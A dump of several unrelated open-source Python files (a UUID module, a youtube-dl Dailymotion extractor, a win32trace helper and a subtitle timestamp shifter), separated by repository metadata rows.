r"""Create a UUID from either a string of 32 hexadecimal digits,
a string of 16 bytes as the 'bytes' argument, a string of 16 bytes
in little-endian order as the 'bytes_le' argument, a tuple of six
integers (32-bit time_low, 16-bit time_mid, 16-bit time_hi_version,
8-bit clock_seq_hi_variant, 8-bit clock_seq_low, 48-bit node) as
the 'fields' argument, or a single 128-bit integer as the 'int'
argument. When a string of hex digits is given, curly braces,
hyphens, and a URN prefix are all optional. For example, these
expressions all yield the same UUID:
UUID('{12345678-1234-5678-1234-567812345678}')
UUID('12345678123456781234567812345678')
UUID('urn:uuid:12345678-1234-5678-1234-567812345678')
UUID(bytes='\x12\x34\x56\x78'*4)
UUID(bytes_le='\x78\x56\x34\x12\x34\x12\x78\x56' +
'\x12\x34\x56\x78\x12\x34\x56\x78')
UUID(fields=(0x12345678, 0x1234, 0x5678, 0x12, 0x34, 0x567812345678))
UUID(int=0x12345678123456781234567812345678)
Exactly one of 'hex', 'bytes', 'bytes_le', 'fields', or 'int' must
be given. The 'version' argument is optional; if given, the resulting
UUID will have its variant and version set according to RFC 4122,
overriding the given 'hex', 'bytes', 'bytes_le', 'fields', or 'int'.
"""
if [hex, bytes, bytes_le, fields, int].count(None) != 4:
raise TypeError('need one of hex, bytes, bytes_le, fields, or int')
if hex is not None:
hex = hex.replace('urn:', '').replace('uuid:', '')
hex = hex.strip('{}').replace('-', '')
if len(hex) != 32:
raise ValueError('badly formed hexadecimal UUID string')
int = long(hex, 16)
if bytes_le is not None:
if len(bytes_le) != 16:
raise ValueError('bytes_le is not a 16-char string')
bytes = (bytes_le[3] + bytes_le[2] + bytes_le[1] + bytes_le[0] +
bytes_le[5] + bytes_le[4] + bytes_le[7] + bytes_le[6] +
bytes_le[8:])
if bytes is not None:
if len(bytes) != 16:
raise ValueError('bytes is not a 16-char string')
int = long(('%02x' * 16) % tuple(map(ord, bytes)), 16)
if fields is not None:
if len(fields) != 6:
raise ValueError('fields is not a 6-tuple')
(time_low, time_mid, time_hi_version,
clock_seq_hi_variant, clock_seq_low, node) = fields
if not 0 <= time_low < 1 << 32L:
raise ValueError('field 1 out of range (need a 32-bit value)')
if not 0 <= time_mid < 1 << 16L:
raise ValueError('field 2 out of range (need a 16-bit value)')
if not 0 <= time_hi_version < 1 << 16L:
raise ValueError('field 3 out of range (need a 16-bit value)')
if not 0 <= clock_seq_hi_variant < 1 << 8L:
raise ValueError('field 4 out of range (need an 8-bit value)')
if not 0 <= clock_seq_low < 1 << 8L:
raise ValueError('field 5 out of range (need an 8-bit value)')
if not 0 <= node < 1 << 48L:
raise ValueError('field 6 out of range (need a 48-bit value)')
clock_seq = (clock_seq_hi_variant << 8L) | clock_seq_low
int = ((time_low << 96L) | (time_mid << 80L) |
(time_hi_version << 64L) | (clock_seq << 48L) | node)
if int is not None:
if not 0 <= int < 1 << 128L:
raise ValueError('int is out of range (need a 128-bit value)')
if version is not None:
if not 1 <= version <= 5:
raise ValueError('illegal version number')
# Set the variant to RFC 4122.
int &= ~(0xc000 << 48L)
int |= 0x8000 << 48L
# Set the version number.
int &= ~(0xf000 << 64L)
int |= version << 76L
self.__dict__['int'] = int
def __cmp__(self, other):
if isinstance(other, UUID):
return cmp(self.int, other.int)
return NotImplemented
def __hash__(self):
return hash(self.int)
def __int__(self):
return self.int
def __repr__(self):
return 'UUID(%r)' % str(self)
def __setattr__(self, name, value):
raise TypeError('UUID objects are immutable')
def __str__(self):
hex = '%032x' % self.int
return '%s-%s-%s-%s-%s' % (
hex[:8], hex[8:12], hex[12:16], hex[16:20], hex[20:])
def get_bytes(self):
bytes = ''
for shift in range(0, 128, 8):
bytes = chr((self.int >> shift) & 0xff) + bytes
return bytes
bytes = property(get_bytes)
def get_bytes_le(self):
bytes = self.bytes
return (bytes[3] + bytes[2] + bytes[1] + bytes[0] +
bytes[5] + bytes[4] + bytes[7] + bytes[6] + bytes[8:])
bytes_le = property(get_bytes_le)
def get_fields(self):
return (self.time_low, self.time_mid, self.time_hi_version,
self.clock_seq_hi_variant, self.clock_seq_low, self.node)
fields = property(get_fields)
def get_time_low(self):
return self.int >> 96L
time_low = property(get_time_low)
def get_time_mid(self):
return (self.int >> 80L) & 0xffff
time_mid = property(get_time_mid)
def get_time_hi_version(self):
return (self.int >> 64L) & 0xffff
time_hi_version = property(get_time_hi_version)
def get_clock_seq_hi_variant(self):
return (self.int >> 56L) & 0xff
clock_seq_hi_variant = property(get_clock_seq_hi_variant)
def get_clock_seq_low(self):
return (self.int >> 48L) & 0xff
clock_seq_low = property(get_clock_seq_low)
def get_time(self):
return (((self.time_hi_version & 0x0fffL) << 48L) |
(self.time_mid << 32L) | self.time_low)
time = property(get_time)
def get_clock_seq(self):
return (((self.clock_seq_hi_variant & 0x3fL) << 8L) |
self.clock_seq_low)
clock_seq = property(get_clock_seq)
def get_node(self):
return self.int & 0xffffffffffff
node = property(get_node)
def get_hex(self):
return '%032x' % self.int
hex = property(get_hex)
def get_urn(self):
return 'urn:uuid:' + str(self)
urn = property(get_urn)
def get_variant(self):
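        # The variant is encoded in the most significant bits of
        # clock_seq_hi_variant: 0xx -> NCS, 10x -> RFC 4122,
        # 110 -> Microsoft, 111 -> reserved for future definition.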
if not self.int & (0x8000 << 48L):
return RESERVED_NCS
elif not self.int & (0x4000 << 48L):
return RFC_4122
elif not self.int & (0x2000 << 48L):
return RESERVED_MICROSOFT
else:
return RESERVED_FUTURE
variant = property(get_variant)
def get_version(self):
# The version bits are only meaningful for RFC 4122 UUIDs.
if self.variant == RFC_4122:
return int((self.int >> 76L) & 0xf)
version = property(get_version)
def _find_mac(command, args, hw_identifiers, get_index):
import os
for dir in ['', '/sbin/', '/usr/sbin']:
executable = os.path.join(dir, command)
if not os.path.exists(executable):
continue
try:
# LC_ALL to get English output, 2>/dev/null to
# prevent output on stderr
cmd = 'LC_ALL=C %s %s 2>/dev/null' % (executable, args)
pipe = os.popen(cmd)
except IOError:
continue
for line in pipe:
words = line.lower().split()
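            # e.g. for ifconfig a line like "ether 08:00:27:9c:5a:2e ..." is
            # matched on "ether" and get_index then picks the address word.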
for i in range(len(words)):
if words[i] in hw_identifiers:
return int(words[get_index(i)].replace(':', ''), 16)
return None
def _ifconfig_getnode():
"""Get the hardware address on Unix by running ifconfig."""
# This works on Linux ('' or '-a'), Tru64 ('-av'), but not all Unixes.
for args in ('', '-a', '-av'):
mac = _find_mac('ifconfig', args, ['hwaddr', 'ether'], lambda i: i + 1)
if mac:
return mac
import socket
ip_addr = socket.gethostbyname(socket.gethostname())
# Try getting the MAC addr from arp based on our IP address (Solaris).
mac = _find_mac('arp', '-an', [ip_addr], lambda i: -1)
if mac:
return mac
# This might work on HP-UX.
mac = _find_mac('lanscan', '-ai', ['lan0'], lambda i: 0)
if mac:
return mac
return None
def _ipconfig_getnode():
"""Get the hardware address on Windows by running ipconfig.exe."""
import os
import re
dirs = ['', r'c:\windows\system32', r'c:\winnt\system32']
try:
import ctypes
buffer = ctypes.create_string_buffer(300)
ctypes.windll.kernel32.GetSystemDirectoryA(buffer, 300)
dirs.insert(0, buffer.value.decode('mbcs'))
except:
pass
for dir in dirs:
try:
pipe = os.popen(os.path.join(dir, 'ipconfig') + ' /all')
except IOError:
continue
for line in pipe:
value = line.split(':')[-1].strip().lower()
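            # e.g. "Physical Address. . . . . . . . . : 00-16-3E-4A-5B-6C"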
if re.match('([0-9a-f][0-9a-f]-){5}[0-9a-f][0-9a-f]', value):
return int(value.replace('-', ''), 16)
def _netbios_getnode():
"""Get the hardware address on Windows using NetBIOS calls.
See http://support.microsoft.com/kb/118623 for details."""
import win32wnet
import netbios
ncb = netbios.NCB()
ncb.Command = netbios.NCBENUM
ncb.Buffer = adapters = netbios.LANA_ENUM()
adapters._pack()
if win32wnet.Netbios(ncb) != 0:
return
adapters._unpack()
for i in range(adapters.length):
ncb.Reset()
ncb.Command = netbios.NCBRESET
ncb.Lana_num = ord(adapters.lana[i])
if win32wnet.Netbios(ncb) != 0:
continue
ncb.Reset()
ncb.Command = netbios.NCBASTAT
ncb.Lana_num = ord(adapters.lana[i])
ncb.Callname = '*'.ljust(16)
ncb.Buffer = status = netbios.ADAPTER_STATUS()
if win32wnet.Netbios(ncb) != 0:
continue
status._unpack()
bytes = map(ord, status.adapter_address)
return ((bytes[0] << 40L) + (bytes[1] << 32L) + (bytes[2] << 24L) +
(bytes[3] << 16L) + (bytes[4] << 8L) + bytes[5])
# Thanks to Thomas Heller for ctypes and for his help with its use here.
# If ctypes is available, use it to find system routines for UUID generation.
_uuid_generate_random = _uuid_generate_time = _UuidCreate = None
try:
import ctypes
import ctypes.util
_buffer = ctypes.create_string_buffer(16)
# The uuid_generate_* routines are provided by libuuid on at least
# Linux and FreeBSD, and provided by libc on Mac OS X.
for libname in ['uuid', 'c']:
try:
lib = ctypes.CDLL(ctypes.util.find_library(libname))
except:
continue
if hasattr(lib, 'uuid_generate_random'):
_uuid_generate_random = lib.uuid_generate_random
if hasattr(lib, 'uuid_generate_time'):
_uuid_generate_time = lib.uuid_generate_time
# On Windows prior to 2000, UuidCreate gives a UUID containing the
# hardware address. On Windows 2000 and later, UuidCreate makes a
# random UUID and UuidCreateSequential gives a UUID containing the
# hardware address. These routines are provided by the RPC runtime.
# NOTE: at least on Tim's WinXP Pro SP2 desktop box, while the last
# 6 bytes returned by UuidCreateSequential are fixed, they don't appear
# to bear any relationship to the MAC address of any network device
# on the box.
try:
lib = ctypes.windll.rpcrt4
except:
lib = None
_UuidCreate = getattr(lib, 'UuidCreateSequential',
getattr(lib, 'UuidCreate', None))
except:
pass
def _unixdll_getnode():
"""Get the hardware address on Unix using ctypes."""
_uuid_generate_time(_buffer)
return UUID(bytes=_buffer.raw).node
def _windll_getnode():
"""Get the hardware address on Windows using ctypes."""
if _UuidCreate(_buffer) == 0:
return UUID(bytes=_buffer.raw).node
def _random_getnode():
"""Get a random node ID, with eighth bit set as suggested by RFC 4122."""
import random
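    # 0x010000000000 sets the multicast bit (least significant bit of the first
    # octet), so the result can never collide with a real IEEE 802 MAC address.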
return random.randrange(0, 1 << 48L) | 0x010000000000L
_node = None
def getnode():
"""Get the hardware address as a 48-bit positive integer.
The first time this runs, it may launch a separate program, which could
be quite slow. If all attempts to obtain the hardware address fail, we
choose a random 48-bit number with its eighth bit set to 1 as recommended
in RFC 4122.
"""
global _node
if _node is not None:
return _node
import sys
if sys.platform == 'win32':
getters = [_windll_getnode, _netbios_getnode, _ipconfig_getnode]
else:
getters = [_unixdll_getnode, _ifconfig_getnode]
for getter in getters + [_random_getnode]:
try:
_node = getter()
except:
continue
if _node is not None:
return _node
_last_timestamp = None
def uuid1(node=None, clock_seq=None):
"""Generate a UUID from a host ID, sequence number, and the current time.
If 'node' is not given, getnode() is used to obtain the hardware
address. If 'clock_seq' is given, it is used as the sequence number;
otherwise a random 14-bit sequence number is chosen."""
# When the system provides a version-1 UUID generator, use it (but don't
# use UuidCreate here because its UUIDs don't conform to RFC 4122).
if _uuid_generate_time and node is clock_seq is None:
_uuid_generate_time(_buffer)
return UUID(bytes=_buffer.raw)
global _last_timestamp
import time
nanoseconds = int(time.time() * 1e9)
# 0x01b21dd213814000 is the number of 100-ns intervals between the
# UUID epoch 1582-10-15 00:00:00 and the Unix epoch 1970-01-01 00:00:00.
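    # (0x01b21dd213814000 == 122192928000000000 == 141427 days * 86400 s * 10**7)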
timestamp = int(nanoseconds / 100) + 0x01b21dd213814000L
if timestamp <= _last_timestamp:
timestamp = _last_timestamp + 1
_last_timestamp = timestamp
if clock_seq is None:
import random
clock_seq = random.randrange(1 << 14L) # instead of stable storage
time_low = timestamp & 0xffffffffL
time_mid = (timestamp >> 32L) & 0xffffL
time_hi_version = (timestamp >> 48L) & 0x0fffL
clock_seq_low = clock_seq & 0xffL
clock_seq_hi_variant = (clock_seq >> 8L) & 0x3fL
if node is None:
node = getnode()
return UUID(fields=(time_low, time_mid, time_hi_version,
clock_seq_hi_variant, clock_seq_low, node), version=1)
def uuid3(namespace, name):
"""Generate a UUID from the MD5 hash of a namespace UUID and a name."""
try:
from hashlib import md5
except ImportError:
from md5 import md5
hash = md5(namespace.bytes + name).digest()
return UUID(bytes=hash[:16], version=3)
def uuid4():
"""Generate a random UUID."""
# When the system provides a version-4 UUID generator, use it.
if _uuid_generate_random:
_uuid_generate_random(_buffer)
return UUID(bytes=_buffer.raw)
# Otherwise, get randomness from urandom or the 'random' module.
try:
import os
return UUID(bytes=os.urandom(16), version=4)
except:
import random
bytes = [chr(random.randrange(256)) for i in range(16)]
return UUID(bytes=bytes, version=4)
def uuid5(namespace, name):
"""Generate a UUID from the SHA-1 hash of a namespace UUID and a name."""
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
hash = sha(namespace.bytes + name).digest()
return UUID(bytes=hash[:16], version=5)
# The following standard UUIDs are for use with uuid3() or uuid5().
NAMESPACE_DNS = UUID('6ba7b810-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_URL = UUID('6ba7b811-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_OID = UUID('6ba7b812-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_X500 = UUID('6ba7b814-9dad-11d1-80b4-00c04fd430c8')
| agpl-3.0 | -4,337,568,236,918,039,000 | 35.170213 | 79 | 0.6 | false |
vjmac15/Lyilis | lib/youtube_dl/extractor/dailymotion.py | 13 | 18180 | # coding: utf-8
from __future__ import unicode_literals
import re
import json
import itertools
from .common import InfoExtractor
from ..utils import (
determine_ext,
error_to_compat_str,
ExtractorError,
int_or_none,
parse_iso8601,
sanitized_Request,
str_to_int,
unescapeHTML,
mimetype2ext,
)
class DailymotionBaseInfoExtractor(InfoExtractor):
@staticmethod
def _build_request(url):
"""Build a request with the family filter disabled"""
request = sanitized_Request(url)
request.add_header('Cookie', 'family_filter=off; ff=off')
return request
def _download_webpage_handle_no_ff(self, url, *args, **kwargs):
request = self._build_request(url)
return self._download_webpage_handle(request, *args, **kwargs)
def _download_webpage_no_ff(self, url, *args, **kwargs):
request = self._build_request(url)
return self._download_webpage(request, *args, **kwargs)
class DailymotionIE(DailymotionBaseInfoExtractor):
_VALID_URL = r'(?i)https?://(?:(www|touch)\.)?dailymotion\.[a-z]{2,3}/(?:(?:(?:embed|swf|#)/)?video|swf)/(?P<id>[^/?_]+)'
IE_NAME = 'dailymotion'
_FORMATS = [
('stream_h264_ld_url', 'ld'),
('stream_h264_url', 'standard'),
('stream_h264_hq_url', 'hq'),
('stream_h264_hd_url', 'hd'),
('stream_h264_hd1080_url', 'hd180'),
]
_TESTS = [{
'url': 'http://www.dailymotion.com/video/x5kesuj_office-christmas-party-review-jason-bateman-olivia-munn-t-j-miller_news',
'md5': '074b95bdee76b9e3654137aee9c79dfe',
'info_dict': {
'id': 'x5kesuj',
'ext': 'mp4',
'title': 'Office Christmas Party Review – Jason Bateman, Olivia Munn, T.J. Miller',
'description': 'Office Christmas Party Review - Jason Bateman, Olivia Munn, T.J. Miller',
'thumbnail': r're:^https?:.*\.(?:jpg|png)$',
'duration': 187,
'timestamp': 1493651285,
'upload_date': '20170501',
'uploader': 'Deadline',
'uploader_id': 'x1xm8ri',
'age_limit': 0,
'view_count': int,
},
}, {
'url': 'https://www.dailymotion.com/video/x2iuewm_steam-machine-models-pricing-listed-on-steam-store-ign-news_videogames',
'md5': '2137c41a8e78554bb09225b8eb322406',
'info_dict': {
'id': 'x2iuewm',
'ext': 'mp4',
'title': 'Steam Machine Models, Pricing Listed on Steam Store - IGN News',
'description': 'Several come bundled with the Steam Controller.',
'thumbnail': r're:^https?:.*\.(?:jpg|png)$',
'duration': 74,
'timestamp': 1425657362,
'upload_date': '20150306',
'uploader': 'IGN',
'uploader_id': 'xijv66',
'age_limit': 0,
'view_count': int,
},
'skip': 'video gone',
}, {
# Vevo video
'url': 'http://www.dailymotion.com/video/x149uew_katy-perry-roar-official_musi',
'info_dict': {
'title': 'Roar (Official)',
'id': 'USUV71301934',
'ext': 'mp4',
'uploader': 'Katy Perry',
'upload_date': '20130905',
},
'params': {
'skip_download': True,
},
'skip': 'VEVO is only available in some countries',
}, {
# age-restricted video
'url': 'http://www.dailymotion.com/video/xyh2zz_leanna-decker-cyber-girl-of-the-year-desires-nude-playboy-plus_redband',
'md5': '0d667a7b9cebecc3c89ee93099c4159d',
'info_dict': {
'id': 'xyh2zz',
'ext': 'mp4',
'title': 'Leanna Decker - Cyber Girl Of The Year Desires Nude [Playboy Plus]',
'uploader': 'HotWaves1012',
'age_limit': 18,
},
'skip': 'video gone',
}, {
# geo-restricted, player v5
'url': 'http://www.dailymotion.com/video/xhza0o',
'only_matching': True,
}, {
# with subtitles
'url': 'http://www.dailymotion.com/video/x20su5f_the-power-of-nightmares-1-the-rise-of-the-politics-of-fear-bbc-2004_news',
'only_matching': True,
}, {
'url': 'http://www.dailymotion.com/swf/video/x3n92nf',
'only_matching': True,
}, {
'url': 'http://www.dailymotion.com/swf/x3ss1m_funny-magic-trick-barry-and-stuart_fun',
'only_matching': True,
}]
@staticmethod
def _extract_urls(webpage):
# Look for embedded Dailymotion player
matches = re.findall(
r'<(?:(?:embed|iframe)[^>]+?src=|input[^>]+id=[\'"]dmcloudUrlEmissionSelect[\'"][^>]+value=)(["\'])(?P<url>(?:https?:)?//(?:www\.)?dailymotion\.com/(?:embed|swf)/video/.+?)\1', webpage)
return list(map(lambda m: unescapeHTML(m[1]), matches))
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage_no_ff(
'https://www.dailymotion.com/video/%s' % video_id, video_id)
age_limit = self._rta_search(webpage)
description = self._og_search_description(webpage) or self._html_search_meta(
'description', webpage, 'description')
view_count_str = self._search_regex(
(r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserPlays:([\s\d,.]+)"',
r'video_views_count[^>]+>\s+([\s\d\,.]+)'),
webpage, 'view count', default=None)
if view_count_str:
view_count_str = re.sub(r'\s', '', view_count_str)
view_count = str_to_int(view_count_str)
comment_count = int_or_none(self._search_regex(
r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserComments:(\d+)"',
webpage, 'comment count', default=None))
player_v5 = self._search_regex(
[r'buildPlayer\(({.+?})\);\n', # See https://github.com/rg3/youtube-dl/issues/7826
r'playerV5\s*=\s*dmp\.create\([^,]+?,\s*({.+?})\);',
r'buildPlayer\(({.+?})\);',
r'var\s+config\s*=\s*({.+?});',
# New layout regex (see https://github.com/rg3/youtube-dl/issues/13580)
r'__PLAYER_CONFIG__\s*=\s*({.+?});'],
webpage, 'player v5', default=None)
if player_v5:
player = self._parse_json(player_v5, video_id)
metadata = player['metadata']
self._check_error(metadata)
formats = []
for quality, media_list in metadata['qualities'].items():
for media in media_list:
media_url = media.get('url')
if not media_url:
continue
type_ = media.get('type')
if type_ == 'application/vnd.lumberjack.manifest':
continue
ext = mimetype2ext(type_) or determine_ext(media_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, video_id, 'mp4', preference=-1,
m3u8_id='hls', fatal=False))
elif ext == 'f4m':
formats.extend(self._extract_f4m_formats(
media_url, video_id, preference=-1, f4m_id='hds', fatal=False))
else:
f = {
'url': media_url,
'format_id': 'http-%s' % quality,
'ext': ext,
}
m = re.search(r'H264-(?P<width>\d+)x(?P<height>\d+)', media_url)
if m:
f.update({
'width': int(m.group('width')),
'height': int(m.group('height')),
})
formats.append(f)
self._sort_formats(formats)
title = metadata['title']
duration = int_or_none(metadata.get('duration'))
timestamp = int_or_none(metadata.get('created_time'))
thumbnail = metadata.get('poster_url')
uploader = metadata.get('owner', {}).get('screenname')
uploader_id = metadata.get('owner', {}).get('id')
subtitles = {}
subtitles_data = metadata.get('subtitles', {}).get('data', {})
if subtitles_data and isinstance(subtitles_data, dict):
for subtitle_lang, subtitle in subtitles_data.items():
subtitles[subtitle_lang] = [{
'ext': determine_ext(subtitle_url),
'url': subtitle_url,
} for subtitle_url in subtitle.get('urls', [])]
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'timestamp': timestamp,
'uploader': uploader,
'uploader_id': uploader_id,
'age_limit': age_limit,
'view_count': view_count,
'comment_count': comment_count,
'formats': formats,
'subtitles': subtitles,
}
# vevo embed
vevo_id = self._search_regex(
r'<link rel="video_src" href="[^"]*?vevo.com[^"]*?video=(?P<id>[\w]*)',
webpage, 'vevo embed', default=None)
if vevo_id:
return self.url_result('vevo:%s' % vevo_id, 'Vevo')
# fallback old player
embed_page = self._download_webpage_no_ff(
'https://www.dailymotion.com/embed/video/%s' % video_id,
video_id, 'Downloading embed page')
timestamp = parse_iso8601(self._html_search_meta(
'video:release_date', webpage, 'upload date'))
info = self._parse_json(
self._search_regex(
r'var info = ({.*?}),$', embed_page,
'video info', flags=re.MULTILINE),
video_id)
self._check_error(info)
formats = []
for (key, format_id) in self._FORMATS:
video_url = info.get(key)
if video_url is not None:
m_size = re.search(r'H264-(\d+)x(\d+)', video_url)
if m_size is not None:
width, height = map(int_or_none, (m_size.group(1), m_size.group(2)))
else:
width, height = None, None
formats.append({
'url': video_url,
'ext': 'mp4',
'format_id': format_id,
'width': width,
'height': height,
})
self._sort_formats(formats)
# subtitles
video_subtitles = self.extract_subtitles(video_id, webpage)
title = self._og_search_title(webpage, default=None)
if title is None:
title = self._html_search_regex(
r'(?s)<span\s+id="video_title"[^>]*>(.*?)</span>', webpage,
'title')
return {
'id': video_id,
'formats': formats,
'uploader': info['owner.screenname'],
'timestamp': timestamp,
'title': title,
'description': description,
'subtitles': video_subtitles,
'thumbnail': info['thumbnail_url'],
'age_limit': age_limit,
'view_count': view_count,
'duration': info['duration']
}
def _check_error(self, info):
error = info.get('error')
if info.get('error') is not None:
title = error['title']
# See https://developer.dailymotion.com/api#access-error
if error.get('code') == 'DM007':
self.raise_geo_restricted(msg=title)
raise ExtractorError(
'%s said: %s' % (self.IE_NAME, title), expected=True)
def _get_subtitles(self, video_id, webpage):
try:
sub_list = self._download_webpage(
'https://api.dailymotion.com/video/%s/subtitles?fields=id,language,url' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % error_to_compat_str(err))
return {}
info = json.loads(sub_list)
if (info['total'] > 0):
sub_lang_list = dict((l['language'], [{'url': l['url'], 'ext': 'srt'}]) for l in info['list'])
return sub_lang_list
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
class DailymotionPlaylistIE(DailymotionBaseInfoExtractor):
IE_NAME = 'dailymotion:playlist'
_VALID_URL = r'(?:https?://)?(?:www\.)?dailymotion\.[a-z]{2,3}/playlist/(?P<id>.+?)/'
_MORE_PAGES_INDICATOR = r'(?s)<div class="pages[^"]*">.*?<a\s+class="[^"]*?icon-arrow_right[^"]*?"'
_PAGE_TEMPLATE = 'https://www.dailymotion.com/playlist/%s/%s'
_TESTS = [{
'url': 'http://www.dailymotion.com/playlist/xv4bw_nqtv_sport/1#video=xl8v3q',
'info_dict': {
'title': 'SPORT',
'id': 'xv4bw_nqtv_sport',
},
'playlist_mincount': 20,
}]
def _extract_entries(self, id):
video_ids = set()
processed_urls = set()
for pagenum in itertools.count(1):
page_url = self._PAGE_TEMPLATE % (id, pagenum)
webpage, urlh = self._download_webpage_handle_no_ff(
page_url, id, 'Downloading page %s' % pagenum)
if urlh.geturl() in processed_urls:
self.report_warning('Stopped at duplicated page %s, which is the same as %s' % (
page_url, urlh.geturl()), id)
break
processed_urls.add(urlh.geturl())
for video_id in re.findall(r'data-xid="(.+?)"', webpage):
if video_id not in video_ids:
yield self.url_result(
'http://www.dailymotion.com/video/%s' % video_id,
DailymotionIE.ie_key(), video_id)
video_ids.add(video_id)
if re.search(self._MORE_PAGES_INDICATOR, webpage) is None:
break
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
playlist_id = mobj.group('id')
webpage = self._download_webpage(url, playlist_id)
return {
'_type': 'playlist',
'id': playlist_id,
'title': self._og_search_title(webpage),
'entries': self._extract_entries(playlist_id),
}
class DailymotionUserIE(DailymotionPlaylistIE):
IE_NAME = 'dailymotion:user'
_VALID_URL = r'https?://(?:www\.)?dailymotion\.[a-z]{2,3}/(?!(?:embed|swf|#|video|playlist)/)(?:(?:old/)?user/)?(?P<user>[^/]+)'
_PAGE_TEMPLATE = 'http://www.dailymotion.com/user/%s/%s'
_TESTS = [{
'url': 'https://www.dailymotion.com/user/nqtv',
'info_dict': {
'id': 'nqtv',
'title': 'Rémi Gaillard',
},
'playlist_mincount': 100,
}, {
'url': 'http://www.dailymotion.com/user/UnderProject',
'info_dict': {
'id': 'UnderProject',
'title': 'UnderProject',
},
'playlist_mincount': 1800,
'expected_warnings': [
'Stopped at duplicated page',
],
'skip': 'Takes too long time',
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
user = mobj.group('user')
webpage = self._download_webpage(
'https://www.dailymotion.com/user/%s' % user, user)
full_user = unescapeHTML(self._html_search_regex(
r'<a class="nav-image" title="([^"]+)" href="/%s">' % re.escape(user),
webpage, 'user'))
return {
'_type': 'playlist',
'id': user,
'title': full_user,
'entries': self._extract_entries(user),
}
class DailymotionCloudIE(DailymotionBaseInfoExtractor):
_VALID_URL_PREFIX = r'https?://api\.dmcloud\.net/(?:player/)?embed/'
_VALID_URL = r'%s[^/]+/(?P<id>[^/?]+)' % _VALID_URL_PREFIX
_VALID_EMBED_URL = r'%s[^/]+/[^\'"]+' % _VALID_URL_PREFIX
_TESTS = [{
# From http://www.francetvinfo.fr/economie/entreprises/les-entreprises-familiales-le-secret-de-la-reussite_933271.html
# Tested at FranceTvInfo_2
'url': 'http://api.dmcloud.net/embed/4e7343f894a6f677b10006b4/556e03339473995ee145930c?auth=1464865870-0-jyhsm84b-ead4c701fb750cf9367bf4447167a3db&autoplay=1',
'only_matching': True,
}, {
# http://www.francetvinfo.fr/societe/larguez-les-amarres-le-cobaturage-se-developpe_980101.html
'url': 'http://api.dmcloud.net/player/embed/4e7343f894a6f677b10006b4/559545469473996d31429f06?auth=1467430263-0-90tglw2l-a3a4b64ed41efe48d7fccad85b8b8fda&autoplay=1',
'only_matching': True,
}]
@classmethod
def _extract_dmcloud_url(cls, webpage):
mobj = re.search(r'<iframe[^>]+src=[\'"](%s)[\'"]' % cls._VALID_EMBED_URL, webpage)
if mobj:
return mobj.group(1)
mobj = re.search(
r'<input[^>]+id=[\'"]dmcloudUrlEmissionSelect[\'"][^>]+value=[\'"](%s)[\'"]' % cls._VALID_EMBED_URL,
webpage)
if mobj:
return mobj.group(1)
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage_no_ff(url, video_id)
title = self._html_search_regex(r'<title>([^>]+)</title>', webpage, 'title')
video_info = self._parse_json(self._search_regex(
r'var\s+info\s*=\s*([^;]+);', webpage, 'video info'), video_id)
# TODO: parse ios_url, which is in fact a manifest
video_url = video_info['mp4_url']
return {
'id': video_id,
'url': video_url,
'title': title,
'thumbnail': video_info.get('thumbnail_url'),
}
| gpl-3.0 | -8,468,256,538,332,842,000 | 38.174569 | 197 | 0.517302 | false |
chvrga/outdoor-explorer | java/play-1.4.4/python/Lib/site-packages/win32/lib/win32traceutil.py | 9 | 1528 | # This is a helper for the win32trace module
# If imported from a normal Python program, it sets up sys.stdout and sys.stderr
# so output goes to the collector.
# If run from the command line, it creates a collector loop.
# Eg:
# C:>start win32traceutil.py (or python.exe win32traceutil.py)
# will start a process with a (pretty much) blank screen.
#
# then, switch to a DOS prompt, and type:
# C:>python.exe
# Python 1.4 etc...
# >>> import win32traceutil
# Redirecting output to win32trace remote collector
# >>> print "Hello"
# >>>
# And the output will appear in the first collector process.
# Note - the client or the collector can be started first.
# There is a 0x20000 byte buffer. If this gets full, it is reset, and new
# output appended from the start.
import win32trace
def RunAsCollector():
import sys
try:
import win32api
win32api.SetConsoleTitle("Python Trace Collector")
except:
pass # Oh well!
win32trace.InitRead()
print "Collecting Python Trace Output..."
try:
while 1:
# a short timeout means ctrl+c works next time we wake...
sys.stdout.write(win32trace.blockingread(500))
except KeyboardInterrupt:
print "Ctrl+C"
def SetupForPrint():
win32trace.InitWrite()
try: # Under certain servers, sys.stdout may be invalid.
print "Redirecting output to win32trace remote collector"
except:
pass
win32trace.setprint() # this works in an rexec environment.
if __name__=='__main__':
RunAsCollector()
else:
SetupForPrint()
| mit | 2,440,878,280,362,501,000 | 25.781818 | 80 | 0.704188 | false |
hawken93/mplayerhq | TOOLS/vobshift.py | 71 | 1048 | #!/usr/bin/env python
#usage:
#
# vobshift.py in.idx out.idx -8.45
#
# this will read in in.idx,shift it by 8.45 seconds back,
# and save it as out.idx
#
# license: i don't care ;)
#
import datetime
import sys
def tripletize(line):
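    # Splits an .idx line such as "timestamp: 00:02:32:200, filepos: 000000000"
    # into ("timestamp: ", "00:02:32:200", ", filepos: 000000000").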
begin = line[:11]
middle = line[11:23]
end = line[23:]
return (begin,middle,end)
def text2delta(t):
h = int( t[0:2] )
m = int( t[3:5] )
s = int( t[6:8] )
milli = int( t[9:12] )
return datetime.timedelta(hours=h,minutes=m,seconds=s,milliseconds=milli)
def delta2text(d):
t = str(d)
milli = t[8:11]
if len(milli) == 0: #fix for .000 seconds
milli = '000'
return '0'+t[:7]+':'+milli
def shift(line,seconds):
triplet = tripletize(line)
base = text2delta(triplet[1])
base = base + datetime.timedelta(seconds=seconds)
base = delta2text(base)
return triplet[0]+base+triplet[2]
INFILE =sys.argv[1]
OUTFILE =sys.argv[2]
DIFF =float(sys.argv[3])
o = open(OUTFILE,'wt')
for line in open(INFILE):
if line.startswith('timestamp'):
line = shift(line,DIFF)
o.write(line)
o.close()
| gpl-2.0 | -4,942,677,992,306,953,000 | 17.068966 | 74 | 0.649809 | false |
